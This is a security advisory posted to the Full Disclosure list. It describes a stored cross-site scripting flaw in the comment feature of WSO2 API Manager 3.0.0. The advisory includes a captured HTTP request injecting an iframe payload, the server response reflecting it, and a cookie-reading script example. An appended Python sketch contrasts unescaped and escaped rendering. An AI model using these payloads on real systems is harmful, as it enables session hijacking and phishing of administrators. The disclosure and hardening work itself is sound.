Message-ID: <CAJ-5kWaRUWjOd3aGy8ux37SVBa6Vgzk4Fn6t08oHXfbw+z+zsQ@mail.gmail.com>
Date: Mon, 13 Apr 2020 19:57:19 +0200
From: raki ben hamouda <raki7bh@...il.com>
To: Offsec Exploits <submit@...ensive-security.com>, submit@...sec.com, Packet Storm <packet@...ketstormsecurity.com>, fulldisclosure@...lists.org, webmaster@...urityfocus.com, "CERT(R) Coordination Center" <cert@...t.org>
Subject: [FD] WSO2 API Manager Stored XSS Vulnerability

Document Title:
===============
WSO2 API Manager Stored XSS Vulnerability

Common Vulnerability Scoring System:
====================================
5.4

CVE:
====
N/A

Security Advisory:
==================
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700

Latest Release after Fixing Vuln:
=================================
V 3.1.0 (https://wso2.com/library/articles/introducing-wso2-api-manager-3-1/)

Author:
=======
Raki Ben Hamouda

Affected Product(s):
====================
WSO2 API Manager Carbon interface V3.0.0

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A remote stored cross-site scripting vulnerability has been discovered in the Resource Browser component of WSO2 API Manager. It allows a remote attacker with access to the "Resource Browser" component to inject malicious code through the Add Comment feature. The vulnerability is triggered by sending a POST request to `/carbon/info/comment-ajaxprocessor.jsp` with the parameters "comment=targeted&path=%2F". Remote attackers can use it to spread malware, to hijack a session (including a session with higher privileges), or to initiate phishing attacks.

The security risk of the stored XSS web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 5.4. Exploitation of the stored XSS web vulnerability requires a low-privilege web-application user account and medium or high user interaction. Successful exploitation of the vulnerability results in compromising the server.

Request Method:
[+] POST

Module:
[+] /carbon/info/comment-ajaxprocessor.jsp

Parameters:
[+] comment=admincomment
[+] path=%2F

=======================================
POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close

comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F
==============================
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144

// the body of the response includes the attacker's malicious script
<a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right"> </a>
<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker

Proof of Concept (PoC):
=======================
// Let's suppose we're attacking an admin with higher privileges
1- Attacker opens his account
2- Adds an arbitrary comment
3- Intercepts the request
4- Adds a malicious script to the comment
5- The admin accesses his account and goes to add a comment; the malicious script gets executed
===> Admin account compromised
===============================================================================
Example malicious script:
<script> alert(document.cookie); </script>
===============================================================================

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
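As an added example that is not part of this advisory or of WSO2's code, the following Python models the comment renderer: it decodes the POST body quoted above, renders the comment once without output encoding (the behaviour the advisory reports) and once with HTML escaping, and lists the elements a browser would build from each fragment. The template, function names and the `author` field are hypothetical stand-ins for the real JSP.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed from the POST body quoted in the advisory.
REQUEST_BODY = "comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F"

# Hypothetical template modelled on the response fragment the advisory
# quotes; it is not WSO2's JSP.
FRAGMENT = ('<div class="comment" data-path="{path}">{comment} <br/> '
            'posted on 0m ago by {author}</div>')


def parse_comment_request(body: str) -> dict:
    """Decode the form-encoded body into its comment and path fields."""
    fields = parse_qs(body, keep_blank_values=True)
    return {"comment": fields["comment"][0], "path": fields["path"][0]}


def render_vulnerable(req: dict, author: str) -> str:
    """Interpolates the stored comment verbatim: the defect the advisory reports."""
    return FRAGMENT.format(path=req["path"], comment=req["comment"], author=author)


def render_hardened(req: dict, author: str) -> str:
    """HTML-escapes every untrusted value before it reaches the template."""
    # quote=True also encodes quotes, so the same escaping is safe inside the
    # data-path attribute value as well as in element content.
    esc = {k: html.escape(v, quote=True) for k, v in req.items()}
    return FRAGMENT.format(path=esc["path"], comment=esc["comment"],
                           author=html.escape(author, quote=True))


class _TagCollector(HTMLParser):
    """Records the start tags a browser would create from a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_names(fragment: str) -> list:
    """Return the element names present in a rendered fragment, in order."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags
```

With the quoted payload, the vulnerable render yields an extra `iframe` element while the hardened render leaves the comment as inert text.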